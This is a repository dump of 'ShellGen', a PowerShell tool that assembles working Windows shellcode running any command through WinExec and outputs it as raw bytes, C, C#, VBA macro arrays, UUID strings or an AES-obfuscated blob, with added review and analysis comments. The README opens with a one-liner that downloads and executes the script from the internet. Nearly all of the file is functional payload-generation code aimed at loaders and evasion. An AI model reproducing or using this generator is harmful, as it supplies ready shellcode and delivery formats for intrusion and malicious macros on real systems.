├── README.md
└── ShellGen.ps1


/README.md:
--------------------------------------------------------------------------------
# ShellGen

PowerShell script to generate ShellCode in various formats

```
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/ShellGen/main/ShellGen.ps1')
```
```
ShellGen -x64 -Command "cmd /k ipconfig" -OutputFormat "Encrypted"
```
```
ShellGen -x64 -Command "cmd /k ipconfig" -OutputFormat "Raw" -OutputFilePath C:\Users\Senna\Desktop\whoami.bin
```

### Output Formats

```
Raw, ps1, Hex, C, vba, csharp, Encrypted, UUID
```

### Architecture

```
x64, x86
```

### Feed a raw shellcode file

```
Shellgen -RawFile "C:\Users\User\Desktop\file.bin" -OutputFormat vba
```

--------------------------------------------------------------------------------
/ShellGen.ps1:
--------------------------------------------------------------------------------
function ShellGen {

    <#
    .SYNOPSIS
    ShellGen.ps1 | Author: Rob LP (@L3o4j)
    https://github.com/Leo4j/ShellGen

    .DESCRIPTION
    Generate ShellCode in various formats

    .PARAMETER Command
    Command line string that is split into chunks and embedded in the stub by
    x64Command / x86Command. Ignored when -RawFile is given.

    .PARAMETER RawFile
    Path to an existing file whose bytes are read with ReadAllBytes and used
    as the payload instead of the built-in stubs.

    .PARAMETER x64
    Selects the built-in 64-bit stub.

    .PARAMETER x86
    Selects the built-in 32-bit stub.

    .PARAMETER OutputFilePath
    Destination file for the formats that can write to disk. The "Raw" format
    falls back to .\payload.raw when this is empty.

    .PARAMETER OutputFormat
    One of the labels handled by the switch below: Encrypted, Raw, ps1, Hex,
    C, vba, csharp, UUID. Defaults to "Raw". A value that matches no label
    produces no output at all.
    #>

    param (
        [string]$Command,
        [string]$RawFile,
        [switch]$x64,
        [switch]$x86,
        [string]$OutputFilePath,
        [string]$OutputFormat = "Raw"
    )

    if($RawFile){
        if(Test-Path $RawFile){
            $shellcode = [System.IO.File]::ReadAllBytes($RawFile)
        } else {
            Write-Output ""
            Write-Output "[-] Please provide a valid path to a file containing raw shellcode"
            Write-Output ""
            # NOTE(review): this `break` is not inside a loop or switch. In PowerShell
            # that can propagate into the caller and stop the calling script;
            # `return` looks like what was intended - confirm.
            break
        }
    }
    else{
        $ShCommand = $Command

        # NOTE(review): the two `if` blocks below are independent. With both -x64 and
        # -x86 the x86 array replaces the x64 one; with neither (and no -RawFile)
        # $shellcode is never assigned and the formatting code further down
        # operates on a null value.

        if($x64){
            # WinExec x64 PI Null Free
            #
            # The byte values and the relative jmp/call displacements in this array
            # are hard-coded against each other, so no entry can be reordered,
            # removed or resized without invalidating the offsets in the comments.
            #
            # Analysis note: the stub reads the PEB pointer from gs:[0x60], walks the
            # loader module list, and resolves exports by comparing a name hash
            # (ror edx,0xd / add edx,eax loop) with the constant held in r8d.
            # The two hash constants 0x78b5b983 and 0x0e8afe98 and the hashing
            # loop are emitted unchanged in every payload built from this branch,
            # so they are stable byte patterns for static signatures on the
            # non-encrypted output formats.
            [Byte[]] $shellcode = 0x48,0x31,0xd2 # xor rdx,rdx
            $shellcode += 0x65,0x48,0x8b,0x42,0x60 # mov rax,qword ptr gs:[rdx+0x60]
            $shellcode += 0x48,0x8b,0x70,0x18 # mov rsi,qword ptr [rax+0x18]
            $shellcode += 0x48,0x8b,0x76,0x20 # mov rsi,qword ptr [rsi+0x20]  (ModRM 0x76 uses rsi as base; the earlier comment said rax)
            $shellcode += 0x4c,0x8b,0x0e # mov r9,QWORD PTR [rsi]
            $shellcode += 0x4d,0x8b,0x09 # mov r9,QWORD PTR [r9]
            $shellcode += 0x4d,0x8b,0x49,0x20 # mov r9,QWORD PTR [r9+0x20]
            $shellcode += 0xeb,0x63 # jmp 0x7f
            $shellcode += 0x41,0x8b,0x49,0x3c # mov ecx,DWORD PTR [r9+0x3c]
            $shellcode += 0x4d,0x31,0xff # xor r15,r15
            $shellcode += 0x41,0xb7,0x88 # mov r15b,0x88
            $shellcode += 0x4d,0x01,0xcf # add r15,r9
            $shellcode += 0x49,0x01,0xcf # add r15,rcx
            $shellcode += 0x45,0x8b,0x3f # mov r15d,dword ptr [r15]
            $shellcode += 0x4d,0x01,0xcf # add r15,r9
            $shellcode += 0x41,0x8b,0x4f,0x18 # mov ecx,dword ptr [r15+0x18]
            $shellcode += 0x45,0x8b,0x77,0x20 # mov r14d,dword ptr [r15+0x20]
            $shellcode += 0x4d,0x01,0xce # add r14,r9
            $shellcode += 0xe3,0x3f # jrcxz 0x7e
            $shellcode += 0xff,0xc9 # dec ecx
            $shellcode += 0x48,0x31,0xf6 # xor rsi,rsi
            $shellcode += 0x41,0x8b,0x34,0x8e # mov esi,DWORD PTR [r14+rcx*4]
            $shellcode += 0x4c,0x01,0xce # add rsi,r9
            $shellcode += 0x48,0x31,0xc0 # xor rax,rax
            $shellcode += 0x48,0x31,0xd2 # xor rdx,rdx
            $shellcode += 0xfc # cld
            $shellcode += 0xac # lods al,byte ptr ds:[rsi]
            $shellcode += 0x84,0xc0 # test al,al
            $shellcode += 0x74,0x07 # je 0x5e
            $shellcode += 0xc1,0xca,0x0d # ror edx,0xd
            $shellcode += 0x01,0xc2 # add edx,eax
            $shellcode += 0xeb,0xf4 # jmp 0x52
            $shellcode += 0x44,0x39,0xc2 # cmp edx,r8d
            $shellcode += 0x75,0xda # jne 0x3d
            $shellcode += 0x45,0x8b,0x57,0x24 # mov r10d,DWORD PTR [r15+0x24]
            $shellcode += 0x4d,0x01,0xca # add r10,r9
            $shellcode += 0x41,0x0f,0xb7,0x0c,0x4a # movzx ecx,WORD PTR [r10+rcx*2]
            $shellcode += 0x45,0x8b,0x5f,0x1c # mov r11d,DWORD PTR [r15+0x1c]
            $shellcode += 0x4d,0x01,0xcb # add r11,r9
            $shellcode += 0x41,0x8b,0x04,0x8b # mov eax,DWORD PTR [r11+rcx*4]
            $shellcode += 0x4c,0x01,0xc8 # add rax,r9
            $shellcode += 0xc3 # ret
            $shellcode += 0xc3 # ret
            $shellcode += 0x41,0xb8,0x83,0xb9,0xb5,0x78 # mov r8d, 0x78b5b983 TerminateProcess Hash
            $shellcode += 0xe8,0x92,0xff,0xff,0xff # call 0x1c
            $shellcode += 0x48,0x89,0xc3 # mov rbx, rax
            $shellcode += 0x41,0xb8,0x98,0xfe,0x8a,0x0e # mov r8d,0xe8afe98 WinExec Hash
            $shellcode += 0xe8,0x84,0xff,0xff,0xff # call 0x1c
            $shellcode += 0x48,0x31,0xc9 # xor rcx,rcx

            # Variable-length part: the caller-supplied command string, encoded by
            # x64Command. Everything after this point shifts with the command length.
            $shellcode += x64Command $ShCommand

            $shellcode += 0x48,0x8d,0x0c,0x24 # lea rcx,[rsp]
            $shellcode += 0x48,0x31,0xd2 # xor rdx,rdx
            $shellcode += 0x48,0xff,0xc2 # inc rdx
            $shellcode += 0x48,0x83,0xec,0x28 # sub rsp, 0x28
            $shellcode += 0xff,0xd0 # call rax

            $shellcode += 0x48,0x31,0xc9 # xor rcx,rcx
            $shellcode += 0x48,0xff,0xc1 # inc rcx
            $shellcode += 0x48,0x31,0xc0 # xor rax,rax
            $shellcode += 0x04,0x53 # add al, 0x53 exit_thread syscall val
            $shellcode += 0x0f,0x05 # syscall
        }

        if($x86){
            # WinExec x86 PI Null Free
            #
            # 32-bit counterpart of the stub above: PEB pointer from fs:[0x30], the
            # same ror edx,0xd / add edx,eax name hash, and the same two hash
            # constants (0x78b5b983, 0x0e8afe98) pushed as immediates. As with the
            # x64 array, byte order and jump displacements are fixed.
            [Byte[]] $shellcode = 0x89,0xe5 # mov ebp,esp
            $shellcode += 0x81,0xc4,0xf0,0xf9,0xff,0xff # add esp,0xfffff9f0
            $shellcode += 0x31,0xc9 # xor ecx,ecx
            $shellcode += 0x64,0x8b,0x71,0x30 # mov esi,DWORD PTR fs:[ecx+0x30]
            $shellcode += 0x8b,0x76,0x0c # mov esi,DWORD PTR [esi+0xc]
            $shellcode += 0x8b,0x76,0x1c # mov esi,DWORD PTR [esi+0x1c]
            $shellcode += 0x8b,0x5e,0x08 # mov ebx,DWORD PTR [esi+0x8]
            $shellcode += 0x8b,0x7e,0x20 # mov edi,DWORD PTR [esi+0x20]
            $shellcode += 0x8b,0x36 # mov esi,DWORD PTR [esi]
            $shellcode += 0x66,0x39,0x4f,0x18 # cmp WORD PTR [edi+0x18],cx
            $shellcode += 0x75,0xf2 # jne 0x14
            $shellcode += 0xeb,0x06 # jmp 0x2a
            $shellcode += 0x5e # pop esi
            $shellcode += 0x89,0x75,0x04 # mov DWORD PTR [ebp+0x4],esi
            $shellcode += 0xeb,0x54 # jmp 0x7e
            $shellcode += 0xe8,0xf5,0xff,0xff,0xff # call 0x24
            $shellcode += 0x60 # pusha
            $shellcode += 0x8b,0x43,0x3c # mov eax,DWORD PTR [ebx+0x3c]
            $shellcode += 0x8b,0x7c,0x03,0x78 # mov edi,DWORD PTR [ebx+eax*1+0x78]
            $shellcode += 0x01,0xdf # add edi,ebx
            $shellcode += 0x8b,0x4f,0x18 # mov ecx,DWORD PTR [edi+0x18]
            $shellcode += 0x8b,0x47,0x20 # mov eax,DWORD PTR [edi+0x20]
            $shellcode += 0x01,0xd8 # add eax,ebx
            $shellcode += 0x89,0x45,0xfc # mov DWORD PTR [ebp-0x4],eax
            $shellcode += 0xe3,0x36 # jecxz 0x7c
            $shellcode += 0x49 # dec ecx
            $shellcode += 0x8b,0x45,0xfc # mov eax,DWORD PTR [ebp-0x4]
            $shellcode += 0x8b,0x34,0x88 # mov esi,DWORD PTR [eax+ecx*4]
            $shellcode += 0x01,0xde # add esi,ebx
            $shellcode += 0x31,0xc0 # xor eax,eax
            $shellcode += 0x99 # cdq
            $shellcode += 0xfc # cld
            $shellcode += 0xac # lods al,BYTE PTR ds:[esi]
            $shellcode += 0x84,0xc0 # test al,al
            $shellcode += 0x74,0x07 # je 0x5f
            $shellcode += 0xc1,0xca,0x0d # ror edx,0xd
            $shellcode += 0x01,0xc2 # add edx,eax
            $shellcode += 0xeb,0xf4 # jmp 0x53
            $shellcode += 0x3b,0x54,0x24,0x24 # cmp edx,DWORD PTR [esp+0x24]
            $shellcode += 0x75,0xdf # jne 0x44
            $shellcode += 0x8b,0x57,0x24 # mov edx,DWORD PTR [edi+0x24]
            $shellcode += 0x01,0xda # add edx,ebx
            $shellcode += 0x66,0x8b,0x0c,0x4a # mov cx,WORD PTR [edx+ecx*2]
            $shellcode += 0x8b,0x57,0x1c # mov edx,DWORD PTR [edi+0x1c]
            $shellcode += 0x01,0xda # add edx,ebx
            $shellcode += 0x8b,0x04,0x8a # mov eax,DWORD PTR [edx+ecx*4]
            $shellcode += 0x01,0xd8 # add eax,ebx
            $shellcode += 0x89,0x44,0x24,0x1c # mov DWORD PTR [esp+0x1c],eax
            $shellcode += 0x61 # popa
            $shellcode += 0xc3 # ret
            $shellcode += 0x68,0x83,0xb9,0xb5,0x78 # push 0x78b5b983
            $shellcode += 0xff,0x55,0x04 # call DWORD PTR [ebp+0x4]
            $shellcode += 0x89,0x45,0x10 # mov DWORD PTR [ebp+0x10],eax
            $shellcode += 0x68,0x98,0xfe,0x8a,0x0e # push 0xe8afe98
            $shellcode += 0xff,0x55,0x04 # call DWORD PTR [ebp+0x4]
            $shellcode += 0x89,0x45,0x14 # mov DWORD PTR [ebp+0x14],eax
            $shellcode += 0x31,0xc0 # xor eax,eax
            $shellcode += 0x50 # push eax

            # Variable-length part: the caller-supplied command string, encoded by
            # x86Command.
            $shellcode += x86Command $ShCommand

            $shellcode += 0x89,0xe3 # mov ebx,esp
            $shellcode += 0x50 # push eax
            $shellcode += 0x53 # push ebx
            $shellcode += 0xff,0x55,0x14 # call DWORD PTR [ebp+0x14]
            $shellcode += 0x31,0xc9 # xor ecx,ecx
            $shellcode += 0x51 # push ecx
            $shellcode += 0x6a,0xff # push 0xffffffff
            $shellcode += 0xff,0x55,0x10 # call DWORD PTR [ebp+0x10]
        }
    }

    # Size of the unformatted payload; each branch below reports it next to the
    # size of whatever it wrote.
    $payloadSize = $shellcode.Length

    switch ($OutputFormat) {
        "Encrypted" {
            # Analysis note: this format is obfuscation, not confidentiality.
            #  - The key is 16 letters picked by Get-Random, which is not a
            #    cryptographic RNG; with -Count over a 52-letter pool the letters
            #    are drawn without repetition.
            #  - The key is printed on the line directly above the ciphertext.
            #  - AESEncrypt (defined later in this file) derives the AES key as
            #    SHA-256 of these key bytes and uses CBC with an all-zero IV and
            #    PKCS7 padding.
            # Anyone holding the emitted AESkey[] / payload[] pair can therefore
            # recover the plaintext bytes with exactly those parameters.
            $keyString = -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
            $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($keyString)
            $encryptedData = AESEncrypt -plainText $shellcode -Key $keyBytes
            $formattedOutput = Format-ByteArray -byteArray $encryptedData
            $formattedKey = Format-ByteArray -byteArray $keyBytes
            Write-Output "AESkey[] = {$formattedKey}"
            Write-Output "payload[] = {$formattedOutput}"
            Write-Output ""
        }
        "Raw" {
            # Writes the bytes unmodified; the only format that always touches disk.
            if (-not $OutputFilePath) {
                $OutputFilePath = ".\payload.raw"
            }
            # NOTE(review): `-Encoding Byte` is accepted by Windows PowerShell 5.1;
            # PowerShell 6+ replaced it with -AsByteStream, so this line is
            # expected to fail there - confirm the supported host version.
            Set-Content -Path $OutputFilePath -Value $shellcode -Encoding Byte
            $finalSize = (Get-Item $OutputFilePath).length
            Write-Output "Payload size: $payloadSize bytes"
            Write-Output "Final size of raw file: $finalSize bytes"
            Write-Output "[*] Payload saved to $OutputFilePath"
            Write-Output ""
        }
        "ps1" {
            # One-line PowerShell byte-array literal: [Byte[]] $buf = 0x..,0x..,...
            $ps1Content = "[Byte[]] `$buf = $(($shellcode | ForEach-Object { `"0x{0:X2}`" -f $_ }) -join ',')"

            if ($OutputFilePath) {
                Set-Content -Path $OutputFilePath -Value $ps1Content
                $finalSize = (Get-Item $OutputFilePath).length
                Write-Output "Payload size: $payloadSize bytes"
                Write-Output "Final size of ps1 file: $finalSize bytes"
                Write-Output "[*] Payload saved to $OutputFilePath"
            }
            else{
                Write-Output "Payload size: $payloadSize bytes"
                Write-Output $ps1Content
            }
            Write-Output ""
        }
        "Hex" {
            # Upper-case hex string with no separators; console output only
            # (-OutputFilePath is not consulted in this branch).
            $hexContent = "$($shellcode | foreach-object { "$($_.ToString("X2"))" })"
            # The string interpolation above joins the elements with spaces; strip them.
            $hexContent = $hexContent.replace(' ', '')
            Write-Output "Payload size: $payloadSize bytes"
            Write-Output "Final size of Hex string: $($hexContent.Length) characters"
            Write-Output $hexContent
            Write-Output ""
        }
        "C" {
            # C string-literal array, 15 escaped bytes (\xNN) per source line.
            $formattedShellcode = $shellcode | ForEach-Object { '\x' + $_.ToString('X2') }
            $lines = @()
            for ($i = 0; $i -lt $formattedShellcode.Length; $i += 15) {
                $line = $formattedShellcode[$i..[Math]::Min($i+14, $formattedShellcode.Length-1)] -join ''
                $lines += "`"$line`""
            }
            $cContent = "unsigned char buf[] =`n" + ($lines -join "`n") + ";"
            if ($OutputFilePath) {
                Set-Content -Path $OutputFilePath -Value $cContent
                $finalSize = (Get-Item $OutputFilePath).length
                Write-Output "Payload size: $payloadSize bytes"
                Write-Output "Final size of C file: $finalSize bytes"
            }
            else{
                Write-Output "Payload size: $payloadSize bytes"
            }
            # Unlike the ps1/csharp branches, the content is echoed even when it
            # was also written to a file.
            Write-Output $cContent
            Write-Output ""
        }
        "vba" {
            # VBA Array() literal in decimal, split into 100-element pieces that
            # are joined at runtime by the Concatenate helper printed below.
            $chunkSize = 100
            $shellcodeChunks = @()

            # Initialize the first chunk to avoid repetition
            $vbaContent = "buf = Array(" + ($shellcode[0..([Math]::Min($chunkSize - 1, $shellcode.Length - 1))] -join ',') + ")" + "`n"

            # Loop through the rest of the shellcode starting from the second chunk
            for ($i = $chunkSize; $i -lt $shellcode.Length; $i += $chunkSize) {
                $chunk = $shellcode[$i..([Math]::Min($i + $chunkSize - 1, $shellcode.Length - 1))]
                $shellcodeChunks += "buf = Concatenate(buf, Array(" + ($chunk -join ',') + "))"
            }

            # Combine all chunks into VBA content
            $vbaContent += ($shellcodeChunks -join "`n")

            # Output or save to file
            if ($OutputFilePath) {
                Set-Content -Path $OutputFilePath -Value $vbaContent
                $finalSize = (Get-Item $OutputFilePath).length
                Write-Output ""
                Write-Output "Payload size: $payloadSize bytes"
                Write-Output ""
                Write-Output "Final size of vbapplication file: $finalSize bytes"
                Write-Output "[*] Payload saved to $OutputFilePath"
            } else {
                Write-Output ""
                Write-Output "Payload size: $payloadSize bytes"
                Write-Output ""
                Write-Output $vbaContent
            }
            Write-Output ""
            Write-Output "!! Add the following function to your VBA script !!"
            Write-Output ""
            # Literal here-string; its lines and the closing '@ must stay at column 0.
            Write-Output @'
Function Concatenate(arr1 As Variant, arr2 As Variant) As Variant
Dim result() As Variant
Dim i As Long, j As Long, k As Long

' Resize the result array to fit both arrays
ReDim result(LBound(arr1) To UBound(arr1) + UBound(arr2) - LBound(arr2) + 1)

' Copy first array to result
For i = LBound(arr1) To UBound(arr1)
result(i) = arr1(i)
Next i

' Copy second array to result
k = i ' Start index for the second array in the result
For j = LBound(arr2) To UBound(arr2)
result(k) = arr2(j)
k = k + 1
Next j

Concatenate = result
End Function
'@
            Write-Output ""
        }
        "csharp" {
            # C# byte-array initializer, 15 values (0xNN) per source line.
            $formattedShellcode = $shellcode | ForEach-Object { '0x' + $_.ToString('X2') }
            $lines = @()
            for ($i = 0; $i -lt $formattedShellcode.Length; $i += 15) {
                $line = $formattedShellcode[$i..[Math]::Min($i+14, $formattedShellcode.Length-1)] -join ','
                $lines += $line
            }
            $csharpContent = "byte[] buf = new byte[$payloadSize] {`n" + ($lines -join ",`n") + "};"
            if ($OutputFilePath) {
                Set-Content -Path $OutputFilePath -Value $csharpContent
                $finalSize = (Get-Item $OutputFilePath).length
                Write-Output "Payload size: $payloadSize bytes"
                Write-Output "Final size of csharp file: $finalSize bytes"
                Write-Output "[*] Payload saved to $OutputFilePath"
            }
            else {
                Write-Output "Payload size: $payloadSize bytes"
                Write-Output $csharpContent
            }
            Write-Output ""
        }
        "UUID" {
            # One quoted GUID string per 16 payload bytes; see Convert-UUID.
            $UUIDContent = Convert-UUID -bin $shellcode

            if ($OutputFilePath) {
                Set-Content -Path $OutputFilePath -Value $UUIDContent
                $finalSize = (Get-Item $OutputFilePath).length
                # NOTE(review): the label below says "csharp file" although this is
                # the UUID branch - presumably copied from the csharp branch.
                Write-Output "Final size of csharp file: $finalSize bytes"
                Write-Output "[*] Payload saved to $OutputFilePath"
            }
            else {
                Write-Output $UUIDContent
            }
        }
    }
}

# Returns a reversed copy of $chunks: the pipeline copies the elements into a
# new array, which is then reversed in place, so the argument is not modified.
function x64Reverse ([array] $chunks) {
    $arr = $chunks | ForEach-Object { $_ }
    [array]::Reverse($arr)
    return $arr
}

# Identical body to x64Reverse; kept as a separate name for the x86 path.
function x86Reverse ([array] $chunks) {
    $arr = $chunks | ForEach-Object { $_ }
    [array]::Reverse($arr)
    return $arr
}

# Encodes one command chunk (at most 8 characters, as produced by x64Command)
# as the immediate operand of the `mov rcx, imm64` that x64Command emits.
# Every byte is bitwise-inverted because x64Command follows the load with
# `not rcx` (0x48,0xf7,0xd1), which restores the original values.
function x64Encode-Command {
    param (
        [string]$command
    )
    # Pad short chunks with spaces up to 7 characters.
    while ($command.Length -lt 7) {
        $command = $command + " "
    }

    $result = [System.Text.Encoding]::UTF8.GetBytes($command)
    # -bnot yields a negative Int32; the outer -band 0xFF keeps only the low byte.
    $result = $result | ForEach-Object { -bnot ($_ -band 0xFF) -band 0xFF }
    # A 7-character chunk gets an eighth byte of 0xff, which the later
    # `not rcx` turns into 0x00.
    if ($command.Length -lt 8) {
        $result += 0xff
    }
    return $result

}

# Encodes one command chunk (at most 4 characters, as produced by x86Command)
# as the 4-byte immediate of a `push imm32`. No inversion is applied here;
# short chunks are filled with spaces (0x20).
function x86Encode-Command {
    param (
        [string]$command
    )
    while ($command.Length -lt 3) {
        $command = $command + " "
    }

    $result = [System.Text.Encoding]::UTF8.GetBytes($command)
    if ($command.Length -lt 4) {
        $result += 0x20
    }
    return $result

}

# Builds the instruction bytes that place $command on the stack for the x64
# stub: the string is cut into 8-character chunks and each chunk becomes
#   0x48,0xb9 <8 encoded bytes>   mov rcx, imm64
#   0x48,0xf7,0xd1                not rcx
#   0x51                          push rcx
# Chunks are emitted last-first because each push lands below the previous one.
function x64Command ([string] $command) {
    $size = 8
    $chunks = @(for ($i = 0; $i -lt $command.Length; $i += $size) { $command.Substring($i, [Math]::Min($size, $command.Length - $i)) })
    $output = @()
    if ($chunks.Count -gt 1) {
        $chunks = x64Reverse($chunks)
    } else {
        # Single-chunk (or empty) command: first push a fixed quadword that decodes,
        # after `not rcx`, to seven spaces followed by a zero byte.
        $output += 0x48,0xb9,0xdf,0xdf,0xdf,0xdf,0xdf,0xdf,0xdf,0xff,0x48,0xf7,0xd1,0x51
    }
    foreach ($chunk in $chunks) {
        $output += 0x48,0xb9
        $output += x64Encode-Command $chunk
        $output += 0x48,0xf7,0xd1
        $output += 0x51
    }
    return $output
}

# x86 counterpart of x64Command: 4-character chunks, each emitted as
# 0x68 <4 bytes> (push imm32), last chunk first.
function x86Command ([string] $command) {
    $size = 4
    $chunks = @(for ($i = 0; $i -lt $command.Length; $i += $size) { $command.Substring($i, [Math]::Min($size, $command.Length - $i)) })
    $output = @()
    if ($chunks.Count -gt 1) {
        $chunks = x86Reverse($chunks)
    }
    foreach ($chunk in $chunks) {
        $output += 0x68
        $output += x86Encode-Command $chunk
    }
    return $output
}

# AES-CBC/PKCS7 encryption of $plainText; returns the ciphertext bytes only
# (no IV or header is prepended).
#
# Analysis notes, all visible in the body:
#  - The length check applies to the caller's key, but the key actually used
#    is always SHA-256($Key), i.e. 32 bytes (AES-256), whatever length passed.
#  - The IV is 16 zero bytes on every call, so the same key and plaintext
#    always produce the same ciphertext.
#  - Decryption therefore needs only the caller's key: hash it with SHA-256
#    and decrypt as AES-256-CBC, zero IV, PKCS7.
# NOTE(review): the Aes, SHA256 and encryptor objects are IDisposable and are
# not disposed here.
function AESEncrypt {
    param (
        [byte[]]$plainText, # The data to be encrypted
        [byte[]]$Key # The cleartext key
    )

    if ($Key.Length -ne 16 -and $Key.Length -ne 24 -and $Key.Length -ne 32) {
        throw "Invalid key size. AES supports keys of 128, 192, or 256 bits."
    }

    $aesAlg = [System.Security.Cryptography.Aes]::Create()
    $aesAlg.Key = [System.Security.Cryptography.SHA256]::Create().ComputeHash($Key) # Hash the key to match Python scripts if needed
    $aesAlg.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aesAlg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aesAlg.IV = [byte[]](0..15 | ForEach-Object { 0 }) # Fixed IV of 16 null bytes

    $encryptor = $aesAlg.CreateEncryptor($aesAlg.Key, $aesAlg.IV)
    return $encryptor.TransformFinalBlock($plainText, 0, $plainText.Length)
}

# Renders a byte array as lower-case "0xNN" values separated by ", ".
function Format-ByteArray {
    param (
        [byte[]]$byteArray
    )

    $formattedBytes = $byteArray | ForEach-Object { "0x{0:x2}" -f $_ }
    return ($formattedBytes -join ", ")
}

# Re-encodes $bin as GUID strings, 16 bytes per GUID, and returns them as one
# string in which every GUID is double-quoted and followed by a comma and a
# newline. A final partial group is padded with 0x90 bytes (the variable is
# named $ZerosToAdd, but the filler is 0x90, not zero).
# The payload size goes to the host via Write-Host rather than to the output
# stream, so it is not captured together with the returned text.
function Convert-UUID {
    param (
        [Parameter(Mandatory = $true)]
        [byte[]]$bin
    )

    $offset = 0
    $output = ""

    Write-Host "Payload size: $($bin.Length) bytes"

    while ($offset -lt $bin.Length) {
        $countOfBytesToConvert = $bin.Length - $offset
        if ($countOfBytesToConvert -lt 16) {
            # Add padding with 0x90 if there are less than 16 bytes
            $ZerosToAdd = 16 - $countOfBytesToConvert
            $padding = @(0x90) * $ZerosToAdd
            $byteArray = $bin[$offset..($bin.Length - 1)] + $padding
        } else {
            # Get the next 16 bytes
            $byteArray = $bin[$offset..($offset + 15)]
        }

        # Convert the byte array to little-endian order as per UUID(bytes_le=chunk)
        # Extract fields from the byte array
        # NOTE(review): BitConverter reads in host byte order, so the little-endian
        # layout described above holds on little-endian hosts - confirm if the
        # script is expected to run elsewhere.
        $Data1 = [BitConverter]::ToInt32($byteArray, 0) # bytes 0-3
        $Data2 = [BitConverter]::ToInt16($byteArray, 4) # bytes 4-5
        $Data3 = [BitConverter]::ToInt16($byteArray, 6) # bytes 6-7
        $Data4 = $byteArray[8..15] # bytes 8-15

        # Create the GUID using the extracted fields
        $uuid = New-Object System.Guid ($Data1, $Data2, $Data3, $Data4)

        $offset += 16

        # Store the UUID in the output
        $output += "`"$uuid`",`n"
    }
    $output
}

--------------------------------------------------------------------------------